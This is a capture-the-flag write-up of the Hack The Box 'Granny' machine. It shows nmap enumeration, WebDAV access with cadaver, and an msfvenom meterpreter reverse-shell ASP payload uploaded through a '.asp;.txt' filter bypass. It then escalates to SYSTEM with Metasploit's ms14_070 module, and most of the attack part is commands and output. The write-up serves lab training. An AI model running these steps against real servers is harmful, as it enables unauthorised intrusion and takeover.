Granny is a surpisingly challenging box if you don’t use metasploit for the initial compromise. This machine tests the user’s ability to enumerate web services, exploit WebDAV, and use metasploit to escalate privileges.
Step 1: Enumerate with NMAP
We start our investigation by enumerating with NMAP.
➜ granny nmap -v -A 10.129.95.234 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-24 12:47 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 12:47
Completed Parallel DNS resolution of 1 host. at 12:47, 0.00s elapsed
Initiating Connect Scan at 12:47
Scanning 10.129.95.234 [1000 ports]
Discovered open port 80/tcp on 10.129.95.234
Completed Connect Scan at 12:47, 6.98s elapsed (1000 total ports)
Initiating Service scan at 12:47
Scanning 1 service on 10.129.95.234
Completed Service scan at 12:47, 6.07s elapsed (1 service on 1 host)
NSE: Script scanning 10.129.95.234.
Initiating NSE at 12:47
Completed NSE at 12:47, 5.04s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.13s elapsed
Initiating NSE at 12:47
Completed NSE at 12:47, 0.00s elapsed
Nmap scan report for 10.129.95.234
Host is up (0.027s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Tue, 24 Jan 2023 17:47:32 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ Server Type: Microsoft-IIS/6.0
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
After many scanning attempts we are finally presented with a valid result. This box already seems a bit unreliable, but we are shown that port 80 is the only open port. IIS 6.0 is running on the box, and http-webdav-scan may prove to be a viable attack vector. Let’s take a look at the WebDAV service.
Step 2: Enumerating WebDAV
We can use a program called cadaver to interact with the WebDAV application. We simply need to supply an ip address.
➜ granny cadaver 10.129.95.234
dav:/> ls
Listing collection `/': succeeded.
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_log 0 Apr 12 2017
Coll: _vti_pvt 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: _vti_txt 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
iisstart.htm 1433 Feb 21 2003
pagerror.gif 2806 Feb 21 2003
postinfo.html 2440 Apr 12 2017
dav:/>
We can see the files hosted on the webserver, but we can also interact with them. After searching Google, we fnd the following link that details uploading files to a WebDAV server: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/put-method-webdav. Perhaps we can upload a reverse shell and triggger it by visiting the page in a web browser.
Step 3: Generating a Reverse Shell with Meterpreter
We can use the following command to generate a reverse shell with meterpreter.
➜ granny msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.86 LPORT=4444 -f asp > rev_shell.txt
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of asp file: 38110 bytes
We use a meterpreter reverse shell for the payload and specify the filetype as asp, as this server runs on ASP.NET.
Step 4: Uploading the Reverse Shell
We can use cadaver to upload the reverse shell. We will need to upload the file with the .txt extension and then make a copy of it with the .asp;.txt extension to bypass file upload filters.
dav:/> put rev_shell.txt
Uploading rev_shell.txt to `/rev_shell.txt':
Progress: [=============================>] 100.0% of 38110 bytes succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_log 0 Apr 12 2017
Coll: _vti_pvt 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: _vti_txt 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
iisstart.htm 1433 Feb 21 2003
pagerror.gif 2806 Feb 21 2003
postinfo.html 2440 Apr 12 2017
rev_shell.txt 38110 Jan 24 12:58
dav:/> copy rev_shell.txt rev_shell.asp;.txt
Copying `/rev_shell.txt' to `/rev_shell.asp%3b.txt': succeeded.
Step 5: Triggering the Reverse shell
We will first need to set up a meterpreter handler to catch our reverse shell connection.
➜ granny msfconsole
.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
=[ metasploit v6.2.37-dev- ]
+ -- --=[ 2277 exploits - 1194 auxiliary - 408 post ]
+ -- --=[ 948 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.86
lhost => 10.10.14.86
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.86:4444
After we have supplied the necessary information for our handler we are able to trigger our reverse shell by navigating to http://10.129.95.234/rev_shell.asp;.txt.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.86:4444
[*] Sending stage (175686 bytes) to 10.129.95.234
[*] Meterpreter session 7 opened (10.10.14.86:4444 -> 10.129.95.234:1032) at 2023-01-24 13:26:00 -0500
Step 6: Migrating Processes
We now see that we hve a meterpreter session on the victim machine. The next step is to migrate from our current process to a another process, this will provide us with a more stable connection.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
320 272 csrss.exe
344 272 winlogon.exe
392 344 services.exe
404 344 lsass.exe
584 392 svchost.exe
668 392 svchost.exe
732 392 svchost.exe
764 392 svchost.exe
796 392 svchost.exe
876 1084 cidaemon.exe
944 392 spoolsv.exe
988 392 msdtc.exe
1084 392 cisvc.exe
1132 392 svchost.exe
1188 392 inetinfo.exe
1224 392 svchost.exe
1328 392 VGAuthService.exe
1404 392 vmtoolsd.exe
1512 392 svchost.exe
1616 392 svchost.exe
1792 392 dllhost.exe
1964 392 alg.exe
1992 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2192 1512 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2372 1084 cidaemon.exe
2420 1084 cidaemon.exe
2448 584 wmiprvse.exe
2536 2192 svchost.exe x86 0 C:\WINDOWS\Temp\rad961F0.tmp\svchost.exe
3532 344 logon.scr
3676 2260 cmd.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\cmd.exe
meterpreter > migrate -P 1992
[*] Migrating from 2536 to 1992...
[*] Migration completed successfully.
Step 7: Finding Exploits with the Local Exploit Suggester
Afterwards, we can send our current meterpreter session to the background and load up our next metasploit module. We will be using the local exploit suggester to find potential privilege escalation exploits.
meterpreter >
Background session 7? [y/N]
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 7
session => 7
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 7 yes The session to run this module on
SHOWDESCRIPTION true yes Displays a detailed description for the available exploits
View the full module info with the info, or info -d command.
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.129.95.234 - Collecting local exploits for x86/windows...
[*] 10.129.95.234 - 176 exploit checks are being tried...
[+] 10.129.95.234 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
This module will create a new session with SYSTEM privileges via the
KiTrap0D exploit by Tavis Ormandy. If the session in use is already
elevated then the exploit will not run. The module relies on
kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
[+] 10.129.95.234 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
This module exploits a NULL Pointer Dereference in win32k.sys, the
vulnerability can be triggered through the use of TrackPopupMenu.
Under special conditions, the NULL pointer dereference can be abused
on xxxSendMessageTimeout to achieve arbitrary code execution. This
module has been tested successfully on Windows XP SP3, Windows 2003
SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1
and Windows 2008 R2 SP1 64 bits.
[+] 10.129.95.234 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
A vulnerability within the Microsoft TCP/IP protocol driver
tcpip.sys can allow a local attacker to trigger a NULL pointer
dereference by using a specially crafted IOCTL. This flaw can be
abused to elevate privileges to SYSTEM.
[+] 10.129.95.234 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
This module exploits improper object handling in the win32k.sys
kernel mode driver. This module has been tested on vulnerable builds
of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.
[+] 10.129.95.234 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
This module exploits the vulnerability in mrxdav.sys described by
MS16-016. The module will spawn a process on the target system and
elevate its privileges to NT AUTHORITY\SYSTEM before executing the
specified payload within the context of the elevated process.
[+] 10.129.95.234 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to
achieve a SYSTEM handle for elevation of privilege. Currently the
module does not spawn as SYSTEM, however once achieving a shell, one
can easily use incognito to impersonate the token.
[+] 10.129.95.234 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due
to the usage of uninitialized data which allows to corrupt memory.
At the moment, the module has been tested successfully on Windows XP
SP3, Windows 2003 SP1, and Windows 7 SP1.
[*] Running check method for exploit 41 / 41
[*] 10.129.95.234 - Valid modules for session 7:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
7 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
8 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
9 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
10 exploit/windows/local/always_install_elevated No The target is not exploitable.
11 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
12 exploit/windows/local/bits_ntlm_token_impersonation No The check raised an exception.
13 exploit/windows/local/bthpan No The target is not exploitable.
14 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
15 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
16 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
17 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
18 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
19 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
20 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
21 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
22 exploit/windows/local/ikeext_service No The check raised an exception.
23 exploit/windows/local/ipass_launch_app No The check raised an exception.
24 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
25 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
26 exploit/windows/local/mqac_write No The target is not exploitable.
27 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows .NET Server (5.2 Build 3790, Service Pack 2). is not vulnerable
28 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
29 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
30 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
31 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The check raised an exception.
32 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
33 exploit/windows/local/ms_ndproxy No The target is not exploitable.
34 exploit/windows/local/novell_client_nicm No The target is not exploitable.
35 exploit/windows/local/ntapphelpcachecontrol No The target is not exploitable.
36 exploit/windows/local/ntusermndragover No The target is not exploitable.
37 exploit/windows/local/panda_psevents No The target is not exploitable.
38 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
39 exploit/windows/local/tokenmagic No The target is not exploitable.
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
[*] Post module execution completed
Step 8: Exploiting the Target
We are presented with a list of potential exploits, and after trying a few we find progress with exploit/windows/local/ms14_070_tcpip_ioctl.
msf6 exploit(multi/handler) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options
Module options (exploit/windows/local/ms14_070_tcpip_ioctl):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 7 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.86 yes The listen address (an interface may be specified)
LPORT 4445 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Server 2003 SP2
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 7
session => 7
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[*] Started reverse TCP handler on 10.10.14.86:4445
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175686 bytes) to 10.129.95.234
[*] Meterpreter session 8 opened (10.10.14.86:4445 -> 10.129.95.234:1033) at 2023-01-24 13:27:03 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We simply supply the session, local host, and local port. After running the exploit we are immediately granted an administrator shell. The last step is to navigate to each user’s desktop and submit the flags.
This box is much more troublesome than this post may indicate, as I have left out all the instances of the various shells crashing and web pages failing to load. Unenjoyable is the first word that comes to mind when I reflect on the process of rooting this box, largely due to the unstable nature of this server.